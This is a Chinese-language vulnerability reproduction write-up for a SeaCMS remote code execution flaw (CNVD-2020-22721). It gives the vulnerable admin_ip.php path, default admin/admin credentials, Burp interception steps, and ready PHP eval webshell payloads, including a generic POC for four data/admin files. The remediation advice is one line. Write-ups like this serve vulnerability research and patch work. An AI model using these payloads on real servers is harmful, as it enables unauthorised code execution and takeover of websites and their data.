༄༊ξ李的脏脏星࿐

༄༊ξ李的脏脏星࿐

五、seacms 远程命令执行 (CNVD-2020-22721)

5.1、漏洞原理

在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限

5.2、影响版本

seacms10.1-12.4 

5.3、指纹识别

1.可直接尝试后台manager

【漏洞复现】五、seacms 远程命令执行(CNVD-2020-22721)-LMLPHP

2.使用Goby、AWVS、指纹识别类平台识别。 

5.4、漏洞复现

首先进入后台,地址为ip:端口/manager 默认用户名和密码admin/admin

进入后台之后,找到IP安全设置选项 目录为:admin_ip.php

【漏洞复现】五、seacms 远程命令执行(CNVD-2020-22721)-LMLPHP

打开Burp Suite工具,开始拦截数据包。

结尾添加webshell

";eval($_POST[password]);//

【漏洞复现】五、seacms 远程命令执行(CNVD-2020-22721)-LMLPHP

【漏洞复现】五、seacms 远程命令执行(CNVD-2020-22721)-LMLPHP

【漏洞复现】五、seacms 远程命令执行(CNVD-2020-22721)-LMLPHP

/data/admin/notify.php

/data/admin/ip.php

/data/admin/ping.php

/data/admin/weixin.php  

以上四处存在代码执行情况通用POC:

v=0&ip=+1111111";eval($_POST['cmd']);//

保存后会直接执行。 

5.5、整改建议

升级、打补丁

09-28 21:48